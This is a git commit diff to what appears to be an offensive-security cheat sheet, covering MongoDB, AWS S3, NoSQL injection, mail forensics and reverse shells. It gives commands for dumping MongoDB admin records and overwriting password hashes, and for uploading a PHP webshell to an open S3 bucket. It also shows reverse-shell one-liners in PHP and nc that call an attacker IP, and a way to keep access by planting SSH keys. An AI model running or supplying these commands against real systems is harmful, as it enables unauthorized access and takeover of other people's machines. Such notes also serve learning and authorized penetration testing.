added MongoDB specifics

Exploits/Databases/MongoDB.md

@@ -0,0 +1,21 @@
+# MongoDB
+
+* The cli tool is `mongo`
+* [List Databases of the DBMS](https://www.mongodb.com/docs/manual/reference/command/listDatabases/)
+
+## List users
+
+```sh
+mongo --port <port> <database_name> --eval "db.admin.find().forEach(printjson);"
+```
+
+## Update User Password
+
+* Generate new password via
+```sh
+mkpasswd -m <hash_algo> SecretPassword123
+```
+* Use the generated password to update a user
+```sh
+mongo --port <port> <database_name> --eval 'db.admin.update({"_id": ObjectID("4711")},{$set:{"x_shadow":"<generated_hash>"}})'
+```

Exploits/Databases/NoSQL Injection.md

@@ -4,12 +4,14 @@
 * Examples are Elasticsearch, MongoDB, Redis, CouchDB.
 
 ## Querying
+
 * Filter instead of SQL queries
 * [Redis docs](https://redis.io/documentation)
 * [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
 * [Elasticsearch docs](https://www.elastic.co/guide/index.html)
 
 ## Operators
+
 * A precondition to the injection is to know the most common operators listed below
 ```sql
 $and

Exploits/Databases/S3.md

@@ -0,0 +1,25 @@
+# AWS S3 Buckets
+
+* `awscli` is the official tool
+
+## Configuration
+
+* An S3 bucket may not be configured to authenticte. Therefore the tool is configured with random credentials via `aws configure`
+
+* List the endpoint via
+```sh
+aws --endpoint=http://s3.example.com s3 ls
+2022-12-08 21:06:33 example.com
+```
+
+* List the top level domain afterwards
+```sh
+aws --endpoint=http://s3.example.com s3 ls s3://example.com
+2022-12-08 21:06:33          0 .htaccess
+2022-12-08 21:06:33      1218 index.html
+```
+
+* Upload a (webshell) and execute
+```sh
+aws --endpoint=http://s3.example.com s3 cp monkey.php s3://example.com
+```

Forensics/Mail.md

@@ -0,0 +1,16 @@
+# Mail Analysis and Forensics
+
+## Tools
+
+```sh
+emlAnalyzer
+```
+
+## References
+
+* [Email reputation](https://emailrep.io)
+* [Virustotal](https://virustotal.com)
+* [Inquest](https://labs.inquest.net)
+* [IPinfo](https://ipinfo.io)
+* [URLscan](https://urlscan.io)
+* [Talos](https://talosintelligence.com)

Reverse Shells/Upgrade Shell.md

@@ -5,7 +5,9 @@
 * [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
 
 ## Via interpreter
+
 ### PHP
+
 * reverse shell
 ```php
 php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
@@ -19,21 +21,29 @@ php -e 'exec "/bin/bash";'
 ```
 
 ### Python 
+
 ```python
 python -c 'import pty; pty.spawn("/bin/bash")'
 ```
 
 ### Perl
+
 ```perl
 perl -e 'exec "/bin/sh";'
 ```
 
 ### Script
+
 ```sh
 /usr/bin/script -qc /bin/bash /dev/null
 ```
+or 
+```sh
+script /dev/null -c bash
+```
 
 ## Next
+
 1. `ctrl` + `z`
 2. `stty echo -raw`
 3. `fg`
@@ -41,12 +51,15 @@ perl -e 'exec "/bin/sh";'
 5. `export TERM=xterm`
 
 ## Via SSH
+
 * `ssh-keygen`
 * copy priv key and `chmod 600`
 * `cat id_rsa.pub > authorized_keys` on target
 
 ## As Code
+
 ### PHP
+
 ```sh
 <?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>
 ```